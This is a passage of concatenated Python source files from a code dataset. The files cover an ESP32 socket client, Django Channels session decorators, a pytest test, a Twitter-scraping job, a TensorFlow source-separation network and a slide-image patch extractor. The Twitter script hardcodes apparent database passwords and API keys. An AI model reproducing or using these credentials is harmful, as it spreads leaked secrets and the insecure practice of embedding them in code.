2):\n    while True:\n        __, frame = vid.read()\n        gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n        parameters = aruco.DetectorParameters_create()\n        corners, ids, rejectedImgPoints = aruco.detectMarkers(\n            gray, aruco_dict, parameters=parameters)\n        frame_markers = aruco.drawDetectedMarkers(frame.copy(), corners, ids)\n        cv2.imshow(\"Ids\", frame_markers)\n        # ids is None or an array of detected marker ids; test membership instead of\n        # comparing the whole array to an int\n        if ids is not None and 2 in ids:\n            client[i].send(str.encode(\"F\"))\n        else:\n            client[i].send(str.encode(\"S\"))\n        if cv2.waitKey(10) & 0xFF == ord('q'):\n            vid.release()\n            cv2.destroyAllWindows()\n            break\n    client[i].close()","sub_path":"Sockets test with esp32 as server.py","file_name":"Sockets test with esp32 as server.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"585210793","text":"import functools\nimport hashlib\nfrom importlib import import_module\n\nfrom django.conf import settings\n\n\ndef linearize(func):\n    \"\"\"\n    Makes sure the contained consumer does not run at the same time other\n    consumers are running on messages with the same reply_channel.\n\n    Required if you don't want weird things like a second consumer starting\n    up before the first has exited and saved its session. 
Doesn't guarantee\n ordering, just linearity.\n \"\"\"\n raise NotImplementedError(\"Not yet reimplemented\")\n\n @functools.wraps(func)\n def inner(message, *args, **kwargs):\n # Make sure there's a reply channel\n if not message.reply_channel:\n raise ValueError(\n \"No reply_channel in message; @linearize can only be used on messages containing it.\"\n )\n # TODO: Get lock here\n pass\n # OK, keep going\n try:\n return func(message, *args, **kwargs)\n finally:\n # TODO: Release lock here\n pass\n return inner\n\n\ndef channel_session(func):\n \"\"\"\n Provides a session-like object called \"channel_session\" to consumers\n as a message attribute that will auto-persist across consumers with\n the same incoming \"reply_channel\" value.\n\n Use this to persist data across the lifetime of a connection.\n \"\"\"\n @functools.wraps(func)\n def inner(message, *args, **kwargs):\n # Make sure there's a reply_channel\n if not message.reply_channel:\n raise ValueError(\n \"No reply_channel sent to consumer; @channel_session \" +\n \"can only be used on messages containing it.\"\n )\n\n # Make sure there's NOT a channel_session already\n if hasattr(message, \"channel_session\"):\n raise ValueError(\"channel_session decorator wrapped inside another channel_session decorator\")\n\n # Turn the reply_channel into a valid session key length thing.\n # We take the last 24 bytes verbatim, as these are the random section,\n # and then hash the remaining ones onto the start, and add a prefix\n reply_name = message.reply_channel.name\n hashed = hashlib.md5(reply_name[:-24].encode()).hexdigest()[:8]\n session_key = \"skt\" + hashed + reply_name[-24:]\n # Make a session storage\n session_engine = import_module(settings.SESSION_ENGINE)\n session = session_engine.SessionStore(session_key=session_key)\n # If the session does not already exist, save to force our\n # session key to be valid.\n if not session.exists(session.session_key):\n session.save(must_create=True)\n message.channel_session = session\n # Run the consumer\n try:\n return func(message, *args, **kwargs)\n finally:\n # Persist session if needed\n if session.modified:\n session.save()\n return inner\n\n\ndef http_session(func):\n \"\"\"\n Wraps a HTTP or WebSocket connect consumer (or any consumer of messages\n that provides a \"cookies\" or \"get\" attribute) to provide a \"http_session\"\n attribute that behaves like request.session; that is, it's hung off of\n a per-user session key that is saved in a cookie or passed as the\n \"session_key\" GET parameter.\n\n It won't automatically create and set a session cookie for users who\n don't have one - that's what SessionMiddleware is for, this is a simpler\n read-only version for more low-level code.\n\n If a message does not have a session we can inflate, the \"session\" attribute\n will be None, rather than an empty session you can write to.\n \"\"\"\n @functools.wraps(func)\n def inner(message, *args, **kwargs):\n if \"cookies\" not in message.content and \"get\" not in message.content:\n raise ValueError(\"No cookies or get sent to consumer - cannot initialise http_session\")\n # Make sure there's NOT a http_session already\n if hasattr(message, \"http_session\"):\n raise ValueError(\"http_session decorator wrapped inside another http_session decorator\")\n # Make sure there's a session key\n session_key = None\n if \"get\" in message.content:\n try:\n session_key = message.content['get'].get(\"session_key\", [])[0]\n except IndexError:\n pass\n if \"cookies\" in message.content and session_key 
is None:\n            session_key = message.content['cookies'].get(settings.SESSION_COOKIE_NAME)\n        # Make a session storage\n        if session_key:\n            session_engine = import_module(settings.SESSION_ENGINE)\n            session = session_engine.SessionStore(session_key=session_key)\n        else:\n            session = None\n        message.http_session = session\n        # Run the consumer\n        result = func(message, *args, **kwargs)\n        # Persist session if needed (won't be saved if error happens)\n        if session is not None and session.modified:\n            session.save()\n        return result\n    return inner\n","sub_path":"channels/decorators.py","file_name":"decorators.py","file_ext":"py","file_size_in_byte":5037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"153479847","text":"import pytest\nfrom model_mommy import mommy\n\npytestmark = pytest.mark.django_db\n\n\nclass TestPublicSshKey:\n    def test_init(self):\n        obj = mommy.make('ewl_ssh.PublicSshKey')\n\n        assert obj.pk == 1, 'Should create a PublicSshKey instance'\n\n    def test_str(self):\n        algorithm = 'ssh-rsa'\n        key = 'this_is_a_very_secure_key'\n        comment = 'user@localhost_1970-01-01'\n\n        obj = mommy.make('ewl_ssh.PublicSshKey', algorithm=algorithm, key=key, comment=comment)\n\n        assert str(obj) == f'{algorithm} {key} {comment}', 'Should return authorized_keys compatible string'\n","sub_path":"ewl_ssh/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"572331647","text":"import pandas as pd\nimport requests\nimport numpy as np\nimport json\nimport csv\nimport time\nimport urllib3\nimport sys\nimport os\nimport warnings\nfrom sqlalchemy import create_engine\nimport psycopg2\nfrom datetime import datetime\nfrom pandas.core.common import SettingWithCopyWarning\nwarnings.simplefilter(action=\"ignore\", category=SettingWithCopyWarning)\n\n\n\nengine = create_engine('postgres://gajpivqijkldsv:e71d7868249438e0b78e6cc37825dad10f322ef598118335a624165f9311720f@ec2-54-211-210-149.compute-1.amazonaws.com:5432/dc5355dnsr456p')\n\nconn = psycopg2.connect(dbname='dc5355dnsr456p', user='gajpivqijkldsv', password='e71d7868249438e0b78e6cc37825dad10f322ef598118335a624165f9311720f',\n                        host='ec2-54-211-210-149.compute-1.amazonaws.com', port='5432', sslmode='require')\ncursor = conn.cursor()\n\n\nmost_recent = pd.read_csv(\"most_recent_tweets.csv\")\n## need to get all twitter handles\n## might be easier to look for the twitter handles based on\nimport tweepy\n\nACCESS_TOKEN = \"924682665399382016-saFgc1u1ASXXhueEhoIhoLtC0h1PUQx\"\nACCESS_TOKEN_SECRET = \"TOTHNVVqqpswW401Cg2G7c6NzAgmvMjIiT2p1BsczBvYu\"\nCONSUMER_KEY = \"KR0RquMlrK6RInnZvhL2ibhQF\"\nCONSUMER_SECRET = \"aDt5c5M0PJP6EfipBDiH2rsVzx87vGaQQ630aAfMYc4ZEFZFve\"\n\n# OAuth process, using the keys and tokens\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\n\n# Creation of the actual interface, using authentication\napi = tweepy.API(auth, wait_on_rate_limit=True)\n\n
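# (Added note) wait_on_rate_limit makes tweepy sleep through Twitter's rate-limit\n# windows automatically, so the Cursor pagination below can walk full timelines\n# without manual back-off handling.\n\n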
handle = most_recent['handle'].to_list()\nsince_id = most_recent['status_id'].to_list()\n\nuser_name_list = []\nfulltest_list = []\nstatus_id_list = []\ncreated_list = []\nsource_list = []\nfavorite_count = []\nretweet_count = []\ncoordinates_list = []\ngeo_list = []\nhandle_list = []\nfollower_count_list = []\ncity_list = []\ncity_abr_list = []\nleague_list = []\ndivision_list = []\n\nfor i in range(0,len(handle)):\n\n    followercount = api.get_user('{}'.format(handle[i])).followers_count\n\n    for status in tweepy.Cursor(api.user_timeline, screen_name= handle[i], tweet_mode=\"extended\",since_id=since_id[i]).items():\n#    for status in tweepy.Cursor(api.user_timeline, screen_name= mlbHandles[i], tweet_mode=\"extended\").items():\n        user_name_list.append(status.user.name)\n        fulltest_list.append(status.full_text)\n        status_id_list.append(np.array(status.id))\n        created_list.append(status.created_at)\n        source_list.append(status.source)\n        favorite_count.append(status.favorite_count)\n        retweet_count.append(status.retweet_count)\n        coordinates_list.append(status.coordinates)\n        geo_list.append(status.geo)\n        handle_list.append(handle[i])\n#        city_list.append(city_mlb[i])\n#        city_abr_list.append(city_abr_mlb[i])\n#        league_list.append(league_mlb[i])\n#        division_list.append(division_mlb[i])\n        follower_count_list.append(followercount)\n\n    time.sleep(5)\n\nnewest_tweets = pd.DataFrame({\n    'username': user_name_list,\n    'full_text': fulltest_list,\n    'status_id': status_id_list,\n    'create_at': created_list,\n    'source': source_list,\n    'favorite_count': favorite_count,\n    'retweet_count': retweet_count,\n    'coordinates': coordinates_list,\n    'geo': geo_list,\n    'handle': handle_list,\n    'followercount': follower_count_list,\n#    'city': city_list,\n#    'city_abr':city_abr_list,\n#    'league':league_list,\n#    'disivion':division_list\n\n})\n\nprint('finished pulling new tweets')\n\n# save off latest tweet id\nmost_recent = newest_tweets[['handle', 'create_at', 'status_id']]\nmost_recent = most_recent[most_recent['create_at'] == most_recent.groupby('handle')['create_at'].transform('max')]\nmost_recent = most_recent.reset_index(drop=True)\n\nmost_recent.to_csv(\"most_recent_tweets.csv\")\n\n# code to create top ten tweets\nnow = pd.to_datetime('now')\nfrom datetime import datetime, timedelta\nd = now - timedelta(days=1)\n\n#get ratio and volume\ntop_5_volume = newest_tweets[newest_tweets['create_at'] > d]\ntop_5_volume = top_5_volume.sort_values(by=['favorite_count'], ascending=False)\ntop_5_volume['favorite_ratio'] = top_5_volume['favorite_count']/top_5_volume['followercount']\ntop_5_ratio = top_5_volume.sort_values(by=['favorite_ratio'], ascending=False)\ntop_5_ratio = top_5_ratio.drop_duplicates(subset=['username'])\ntop_5_volume = top_5_volume.drop_duplicates(subset=['username'])\ntop_5_volume = top_5_volume.head(5)\ntop_5_list = top_5_volume['status_id'].to_list()\n\n# make sure ratio tweets don't have tweets from top 5\ntop_5_ratio = top_5_ratio[~top_5_ratio['status_id'].isin(top_5_list)]\ntop_5_ratio = top_5_ratio.drop_duplicates(subset = ['username'])\ntop_5_ratio = top_5_ratio.head(5)\n\n# create one dataframe\ntweets_top_ten = pd.concat([top_5_volume, top_5_ratio])\ntweets_top_ten = tweets_top_ten.reset_index()\n\ntweet_list = tweets_top_ten['status_id'].to_list()\n\n# add twitter block\nnew_list_for_df = []\nfor i in range(0, len(tweet_list)):\n    new_list_for_df.append('''
      \n
      \n '''.format(tweet_list[i]))\n \ntweets_top_ten['twitter_block'] = new_list_for_df\n\ntweets_top_ten['index'] = tweets_top_ten['index'].values.astype(int)\ntweets_top_ten['favorite_count'] = tweets_top_ten['favorite_count'].values.astype(int)\ntweets_top_ten['retweet_count'] = tweets_top_ten['retweet_count'].values.astype(int)\n\ntest = tweets_top_ten[['index', 'twitter_block', 'full_text', 'username', 'handle']]\n\n# send to database\ntest.to_sql('daily_top_ten', engine, schema='public', if_exists='replace', chunksize=1000, method='multi', index=False)\n\nprint('finished tweets')\n","sub_path":"mlb_twitter.py","file_name":"mlb_twitter.py","file_ext":"py","file_size_in_byte":6037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"219666647","text":"import pytest\nimport os\nimport copy\nimport globus_sdk\nfrom unittest.mock import Mock\nfrom .mocks import (MemoryStorage, MOCK_TOKEN_SET, GlobusTransferTaskResponse,\n ANALYSIS_FILE_BASE_DIR)\n\nfrom pilot.client import PilotClient\nimport pilot\n\n\n@pytest.fixture\ndef mem_storage():\n return MemoryStorage()\n\n\n@pytest.fixture\ndef mock_tokens():\n return copy.deepcopy(MOCK_TOKEN_SET)\n\n\n@pytest.fixture\ndef mock_config(monkeypatch):\n\n class MockConfig(pilot.config.Config):\n data = {}\n\n def save(self, data):\n self.data = {str(k): v for k, v in data.items()}\n\n def load(self):\n return self.data\n\n mc = MockConfig()\n monkeypatch.setattr(pilot.config, 'config', mc)\n return mc\n\n\n@pytest.fixture\ndef simple_tsv():\n return os.path.join(ANALYSIS_FILE_BASE_DIR, 'simple.tsv')\n\n\n@pytest.fixture\ndef mock_transfer_client(monkeypatch):\n st = Mock()\n monkeypatch.setattr(globus_sdk.TransferClient, 'submit_transfer', st)\n st.return_value = GlobusTransferTaskResponse()\n monkeypatch.setattr(globus_sdk, 'TransferData', Mock())\n return st\n\n\n@pytest.fixture\ndef mock_auth_pilot_cli(mock_transfer_client):\n \"\"\"\n Returns a mock logged in pilot client. Storage is mocked with a custom\n object, so this does behave slightly differently than the real client.\n All methods that reach out to remote resources are mocked, you need to\n re-mock them to return the test data you want.\n \"\"\"\n pc = PilotClient()\n pc.token_storage = MemoryStorage()\n pc.token_storage.tokens = MOCK_TOKEN_SET\n pc.upload = Mock()\n pc.ingest_entry = Mock()\n pc.get_search_entry = Mock()\n pc.ls = Mock()\n # Sanity. 
This *should* always return True, but will fail if we update\n    # tokens at a later time.\n    assert pc.is_logged_in()\n    return pc\n\n\n@pytest.fixture\ndef mock_command_pilot_cli(mock_auth_pilot_cli, monkeypatch):\n    mock_func = Mock()\n    mock_func.return_value = mock_auth_pilot_cli\n    monkeypatch.setattr(pilot.commands, 'get_pilot_client', mock_func)\n    return mock_auth_pilot_cli\n","sub_path":"tests/unit/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"400267489","text":"import tensorflow as tf\r\nimport numpy as np\r\nimport os\r\nimport shutil\r\nfrom datetime import datetime\r\nimport keras.backend as K\r\n\r\n\r\ndef self_Att_channel(x, x_att, r=16, name='1'):\r\n    '''\r\n    advanced\r\n    Hu, Jie, Li Shen, and Gang Sun. \"Squeeze-and-excitation networks.\" arXiv preprint arXiv:1709.01507 (2017).\r\n    :param x:\r\n    :param r:\r\n    :return:\r\n    '''\r\n    x_self = x\r\n    chanel = K.int_shape(x)[-1]\r\n    L = K.int_shape(x)[-2]\r\n\r\n    x_att = tf.keras.layers.GlobalAveragePooling2D(name='self_max_pool' + name)(x_att)\r\n\r\n    # x_att = layers.Conv2D(chanel,\r\n    #                       (H,W),\r\n    #                       padding='valid',\r\n    #                       use_bias=None,\r\n    #                       name='FCN' + name)(x_att)\r\n\r\n    x_att = tf.keras.layers.Dense(int(chanel / r), activation='relu')(x_att)\r\n    x_att = tf.keras.layers.Dense(chanel, activation='sigmoid')(x_att)\r\n    x = tf.keras.layers.Multiply()([x_self, x_att])\r\n\r\n    return x\r\n\r\n\r\n
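# (Added note) self_Att_channel is a squeeze-and-excitation gate in the sense of the\r\n# citation above: globally average-pool the attention source, bottleneck it to C/r\r\n# units, re-expand to C with a sigmoid, and rescale x channel-wise with the result.\r\n\r\n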
# def cnv(inp, kernel_shape, scope_name, stride=[1, 1, 1, 1], dorelu=True,\r\n#         weight_init_fn=tf.random_normal_initializer,\r\n#         bias_init_fn=tf.constant_initializer, bias_init_val=0.0, pad='SAME', ):  # kernel_shape: [kernel width, kernel height, input channels, output channels]\r\n#\r\n#     with tf.variable_scope(scope_name):\r\n#         std = 1 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])\r\n#         std = std ** .5\r\n#         weights = tf.get_variable('weights', kernel_shape,\r\n#                                   initializer=weight_init_fn(stddev=std))\r\n#         biases = tf.get_variable('biases', [kernel_shape[-1]],\r\n#                                  initializer=bias_init_fn(bias_init_val))\r\n#         conv = tf.nn.conv2d(inp, weights, strides=stride, padding=pad) + biases\r\n#         # Add ReLU\r\n#         if dorelu:\r\n#             return tf.nn.relu(conv)\r\n#         else:\r\n#             return conv\r\n\r\ndef cnv(inp, output_channel):\r\n    f = output_channel\r\n    conv = tf.layers.batch_normalization(\r\n        tf.layers.conv2d(inputs=inp, filters=f, kernel_size=[3, 3], strides=[1, 1], padding=\"same\",\r\n                         activation=tf.nn.leaky_relu))\r\n    return conv\r\n\r\n\r\nclass SVSRNN(object):\r\n\r\n    def __init__(self, num_features, num_rnn_layer=3, num_hidden_units=[1024, 1024, 1024],\r\n                 tensorboard_directory='graphs/svsrnn', clear_tensorboard=True):\r\n\r\n        assert len(num_hidden_units) == num_rnn_layer\r\n\r\n        self.num_features = num_features\r\n        self.num_rnn_layer = num_rnn_layer\r\n        self.num_hidden_units = num_hidden_units\r\n\r\n        self.gstep = tf.Variable(0, dtype=tf.int32, trainable=False, name='global_step')\r\n        self.learning_rate = tf.placeholder(tf.float32, shape=[], name='learning_rate')\r\n\r\n        # The shape of x_mixed, y_src1, y_src2 are [batch_size, n_frames (time), n_frequencies]\r\n        self.x_mixed = tf.placeholder(tf.float32, shape=[None, None, num_features], name='x_mixed')  # (64,10,513)\r\n        self.y_src1 = tf.placeholder(tf.float32, shape=[None, None, num_features], name='y_src1')\r\n        self.y_src2 = tf.placeholder(tf.float32, shape=[None, None, num_features], name='y_src2')\r\n\r\n        self.y_pred_src1, self.y_pred_src2 = self.network_initializer()\r\n\r\n        # Loss balancing parameter\r\n        self.gamma = 0.001\r\n        self.loss = self.loss_initializer()\r\n        self.optimizer = self.optimizer_initializer()\r\n\r\n        self.saver = tf.train.Saver()\r\n        self.sess = tf.Session()\r\n        self.sess.run(tf.global_variables_initializer())\r\n\r\n        if not os.path.exists(tensorboard_directory):\r\n            os.makedirs(tensorboard_directory)\r\n        # Tensorboard summary\r\n        if clear_tensorboard:\r\n            shutil.rmtree(tensorboard_directory, ignore_errors=True)\r\n            logdir = tensorboard_directory\r\n        else:\r\n            now = datetime.now()\r\n            logdir = os.path.join(tensorboard_directory, now.strftime('%Y%m%d-%H%M%S'))\r\n        self.writer = tf.summary.FileWriter(logdir, tf.get_default_graph())\r\n        self.summary_op = self.summary()\r\n\r\n    def network(self):\r\n        # input_layer = self.x_mixed[:,:,:512]\r\n        input_layer = tf.expand_dims(self.x_mixed, -1)  # ?*10*513*1\r\n        input_layer = tf.transpose(input_layer, [0, 2, 1, 3])  # ?*513*10*1\r\n\r\n        conv1_time = tf.layers.batch_normalization(\r\n            tf.layers.conv2d(inputs=input_layer, filters=16, kernel_size=[2, 10], strides=[1, 1], padding=\"same\",\r\n                             activation=tf.nn.leaky_relu))\r\n        conv1_freq = tf.layers.batch_normalization(\r\n            tf.layers.conv2d(inputs=input_layer, filters=16, kernel_size=[10, 2], strides=[1, 1], padding=\"same\",\r\n                             activation=tf.nn.leaky_relu))\r\n        conv1 = tf.concat([conv1_time, conv1_freq], axis=-1)\r\n        conv2 = tf.layers.batch_normalization(\r\n            tf.layers.conv2d(inputs=conv1, filters=48, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n                             activation=tf.nn.leaky_relu))  # ?*513*10*48\r\n        conv3 = tf.layers.batch_normalization(\r\n            tf.layers.conv2d(inputs=conv2, filters=64, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n                             activation=tf.nn.leaky_relu))  # ?*513*10*64\r\n\r\n        conv4 = tf.layers.batch_normalization(\r\n            tf.layers.conv2d(inputs=conv3, filters=80, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n                             activation=tf.nn.leaky_relu))  # ?*513*10*80\r\n\r\n        # conv4 = self_Att_channel(x=conv4, x_att=conv4, r=64, name='conv2')\r\n        conv5 = tf.layers.batch_normalization(\r\n            tf.layers.conv2d(inputs=conv4, filters=128, kernel_size=[2, 2], strides=[1, 1], padding=\"same\",\r\n                             activation=tf.nn.leaky_relu))  # ?*513*10*128\r\n        conv5 = self_Att_channel(conv5, conv5, r=4, name='conv5')\r\n        layer1 = tf.nn.max_pool(conv5, ksize=[1, 2, 1, 1], strides=[1, 2, 1, 1], padding='VALID',\r\n                                name='max_pool')  # ?*256*10*128\r\n        layer1 = tf.transpose(layer1, [0, 2, 1, 3])  # (?*?*256*128)\r\n\r\n        layer = layer1[:, :, :, 0]\r\n        for i in range(1, 128):\r\n            # layer = layer\r\n            layer_ = layer1[:, :, :, i]\r\n            layer = tf.concat([layer, layer_], axis=-1)  # layer:(?*?*32768) after concatenating all 128 channels\r\n\r\n        # input_layer = cnv(input_layer, 1) # ?*513*10*1\r\n        # inp = tf.squeeze(input_layer, axis=-1) # ?*513*10\r\n        # inp = tf.transpose(inp, [0, 2, 1]) # ?*10*513\r\n        layer = tf.concat([layer, self.x_mixed], axis=-1)  # ?*?*(32768+513)\r\n\r\n        rnn_layer = [tf.nn.rnn_cell.GRUCell(size) for size in self.num_hidden_units]\r\n        multi_rnn_cell = tf.nn.rnn_cell.MultiRNNCell(rnn_layer)\r\n        outputs, state = tf.nn.dynamic_rnn(cell=multi_rnn_cell, inputs=layer,\r\n                                           dtype=tf.float32)  # outputs:(?,?,1024) for the default hidden sizes\r\n        y_hat_src1 = tf.layers.dense(  # y_hat_src1: shape=(?, 10, 513)\r\n            inputs=outputs,\r\n            units=self.num_features,\r\n            activation=tf.nn.relu,\r\n            name='y_hat_src1')\r\n        y_hat_src2 = tf.layers.dense(\r\n            inputs=outputs,\r\n            units=self.num_features,\r\n            activation=tf.nn.relu,\r\n            name='y_hat_src2')\r\n\r\n        # Time-frequency masking layer\r\n        # np.finfo(float).eps: the smallest 
representable positive number such that 1.0 + eps != 1.0\r\n # Absolute value? In principle y_srcs could only be positive in spectrogram\r\n y_tilde_src1 = y_hat_src1 / (\r\n y_hat_src1 + y_hat_src2 + np.finfo(float).eps) * self.x_mixed # y_hat_src1: shape=(?, ?, 513)\r\n y_tilde_src2 = y_hat_src2 / (y_hat_src1 + y_hat_src2 + np.finfo(float).eps) * self.x_mixed\r\n # Mask with Abs\r\n # y_tilde_src1 = tf.abs(y_hat_src1) / (tf.abs(y_hat_src1) + tf.abs(y_hat_src2) + np.finfo(float).eps) * self.x_mixed\r\n # y_tilde_src2 = tf.abs(y_hat_src2) / (tf.abs(y_hat_src1) + tf.abs(y_hat_src2) + np.finfo(float).eps) * self.x_mixed\r\n\r\n return y_tilde_src1, y_tilde_src2\r\n # return y_hat_src1, y_hat_src2\r\n\r\n def network_initializer(self):\r\n\r\n with tf.variable_scope('rnn_network') as scope:\r\n y_pred_src1, y_pred_src2 = self.network()\r\n\r\n return y_pred_src1, y_pred_src2\r\n\r\n def generalized_kl_divergence(self, y, y_hat):\r\n\r\n return tf.reduce_mean(y * tf.log(y / y_hat) - y + y_hat)\r\n\r\n def loss_initializer(self):\r\n\r\n with tf.variable_scope('loss') as scope:\r\n # Mean Squared Error Loss\r\n # loss = tf.reduce_mean(tf.square(self.y_src1 - self.y_pred_src1) + tf.square(self.y_src2 - self.y_pred_src2), name = 'loss') #\r\n # loss = tf.add(\r\n # x=self.generalized_kl_divergence(y=self.y_src1, y_hat=self.y_pred_src1),\r\n # y=self.generalized_kl_divergence(y=self.y_src2, y_hat=self.y_pred_src2),\r\n # name='GKL_loss')\r\n '''\r\n # Generalized KL Divergence Loss\r\n loss = tf.add(\r\n x = self.generalized_kl_divergence(y = self.y_src1, y_hat = self.y_pred_src1), \r\n y = self.generalized_kl_divergence(y = self.y_src2, y_hat = self.y_pred_src2), \r\n name = 'GKL_loss')\r\n\r\n # Mean Squared Error + Signal to Inference Ratio Loss\r\n loss = tf.reduce_mean(tf.square(self.y_src1 - self.y_pred_src1) + tf.square(self.y_src2 - self.y_pred_src2) - self.gamma * (tf.square(self.y_src1 - self.y_pred_src2) + tf.square(self.y_src2 - self.y_pred_src1)), name = 'MSE_SIR_loss')\r\n\r\n # Generalized KL Divergence + Signal to Inference Ratio Loss\r\n loss = tf.subtract(\r\n x = (self.generalized_kl_divergence(y = self.y_src1, y_hat = self.y_pred_src1) + self.generalized_kl_divergence(y = self.y_src2, y_hat = self.y_pred_src2)), \r\n y = self.gamma * (self.generalized_kl_divergence(y = self.y_src1, y_hat = self.y_pred_src2) + self.generalized_kl_divergence(y = self.y_src2, y_hat = self.y_pred_src1)), \r\n name = 'GKL_SIR_loss')\r\n '''\r\n loss = tf.reduce_mean(\r\n tf.square(self.y_src1 - self.y_pred_src1) + tf.square(self.y_src2 - self.y_pred_src2) - self.gamma * (\r\n tf.square(self.y_src1 - self.y_pred_src2) + tf.square(self.y_src2 - self.y_pred_src1)),\r\n name='MSE_SIR_loss')\r\n\r\n return loss\r\n\r\n def optimizer_initializer(self):\r\n\r\n optimizer = tf.train.AdamOptimizer(learning_rate=self.learning_rate).minimize(self.loss, global_step=self.gstep)\r\n\r\n return optimizer\r\n\r\n def train(self, x, y1, y2, learning_rate):\r\n\r\n # step = self.gstep.eval()\r\n\r\n step = self.sess.run(self.gstep)\r\n\r\n _, train_loss, summaries = self.sess.run([self.optimizer, self.loss, self.summary_op],\r\n feed_dict={self.x_mixed: x, self.y_src1: y1, self.y_src2: y2,\r\n self.learning_rate: learning_rate}) # x_mixed:(64,10,513)\r\n self.writer.add_summary(summaries, global_step=step)\r\n return train_loss\r\n\r\n def validate(self, x, y1, y2):\r\n\r\n y1_pred, y2_pred, validate_loss = self.sess.run([self.y_pred_src1, self.y_pred_src2, self.loss],\r\n feed_dict={self.x_mixed: x, self.y_src1: y1, 
self.y_src2: y2})\r\n        return y1_pred, y2_pred, validate_loss\r\n\r\n    def test(self, x):\r\n\r\n        y1_pred, y2_pred = self.sess.run([self.y_pred_src1, self.y_pred_src2], feed_dict={self.x_mixed: x})\r\n\r\n        return y1_pred, y2_pred\r\n\r\n    def save(self, directory, filename):\r\n\r\n        if not os.path.exists(directory):\r\n            os.makedirs(directory)\r\n        self.saver.save(self.sess, os.path.join(directory, filename))\r\n        return os.path.join(directory, filename)\r\n\r\n    def load(self, filepath):\r\n\r\n        self.saver.restore(self.sess, filepath)\r\n\r\n    def summary(self):\r\n        '''\r\n        Create summaries to write on TensorBoard\r\n        '''\r\n        with tf.name_scope('summaries'):\r\n            tf.summary.scalar('loss', self.loss)\r\n            tf.summary.histogram('x_mixed', self.x_mixed)\r\n            tf.summary.histogram('y_src1', self.y_src1)\r\n            tf.summary.histogram('y_src2', self.y_src2)\r\n            summary_op = tf.summary.merge_all()\r\n\r\n        return summary_op","sub_path":"gamma_5_hop2r4.py","file_name":"gamma_5_hop2r4.py","file_ext":"py","file_size_in_byte":12539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} {"seq_id":"575636032","text":"from skimage.external import tifffile\r\nimport matplotlib.pyplot as plt\r\nimport cv2\r\nimport glob\r\nimport os\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport openslide\r\nimport shutil\r\n#dataset_path='/media/disk/han/dataset/seg_viable/'\r\ntumor_abs_path = '/media/disk/han/dataset/Segmentation_whole/'\r\n\r\n\r\nfor i in range(23,41):\r\n\r\n    if not os.path.exists('/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}'.format(i)):\r\n        os.mkdir('/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}'.format(i))\r\n    if not os.path.exists('/media/disk/han/dataset/Segmentation_whole/original_image/{0:03d}'.format(i)):\r\n        os.mkdir('/media/disk/han/dataset/Segmentation_whole/original_image/{0:03d}'.format(i))\r\n\r\n    wsi_list = glob.glob('/media/disk/han/dataset/svs_tif/{0:03d}'.format(i)+'/*.svs')\r\n    wsi_list2 = glob.glob('/media/disk/han/dataset/svs_tif/{0:03d}'.format(i)+'/*.SVS')\r\n    if len(wsi_list2) > 0:\r\n        wsi_list.append(wsi_list2[0])\r\n    file_list = glob.glob('/media/disk/han/dataset/svs_tif/{0:03d}'.format(i) + '/*.tif')\r\n    # use os.path.basename instead of splitting on a Windows separator, so this\r\n    # also works with the POSIX paths used above\r\n    file_name = os.path.basename(file_list[0]).split('.')\r\n    file = file_name[0].split('_')\r\n\r\n\r\n\r\n    wsi_img = openslide.OpenSlide(wsi_list[0])\r\n    if file[3] == 'viable':\r\n        viable_path = file_list[0]\r\n        tumor_path = file_list[1]\r\n    else:\r\n        tumor_path = file_list[0]\r\n        viable_path = file_list[1]\r\n\r\n    tumor_img = tifffile.imread(tumor_path)\r\n    viable_img = tifffile.imread(viable_path)\r\n    h, w = tumor_img.shape\r\n\r\n    for j in range(0, h, 1024):\r\n        for k in range(0, w, 1024):\r\n\r\n            t_img = np.array(tumor_img[j:j + 1024, k:k + 1024])\r\n\r\n            if t_img.shape != (1024, 1024):\r\n                continue\r\n\r\n            patch = wsi_img.read_region((k,j),0,(1024,1024)).convert('RGB')\r\n            a = np.array(patch)\r\n            B, G, R = cv2.split(a)\r\n            _, B = cv2.threshold(B, 235, 1, cv2.THRESH_BINARY)\r\n            _, G = cv2.threshold(G, 210, 1, cv2.THRESH_BINARY)\r\n            _, R = cv2.threshold(R, 235, 1, cv2.THRESH_BINARY)\r\n\r\n            background_label_img = B * G * R\r\n            foreground_label_img = np.ones((1024, 1024)) - background_label_img\r\n\r\n
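            # (Added note) 209715 ≈ 0.2 * 1024 * 1024: patches whose non-background\r\n            # (tissue) area is below ~20% of the tile are skipped.\r\n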
            if foreground_label_img.sum() < 209715:\r\n                continue\r\n\r\n            path = '/media/disk/han/dataset/Segmentation_whole/original_image/{0:03d}/{1}_{2}.png'.format(i,j,k)\r\n            patch.save(path)\r\n\r\n            _, t_img = cv2.threshold(t_img, 0.5, 255, cv2.THRESH_BINARY)\r\n            cv2.imwrite(\r\n                '/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}/'.format(i) + str(j) + '_' + str(\r\n                    k) + '.png', t_img)\r\n\r\n            # the copy below referenced an undefined `original_path` and would have\r\n            # overwritten the label mask written just above; kept for reference only\r\n            # shutil.copy(original_path,\r\n            #             '/media/disk/han/dataset/Segmentation_whole/whole_label_image/{0:03d}/'.format(i) + str(j) + '_' + str(\r\n            #                 k) + 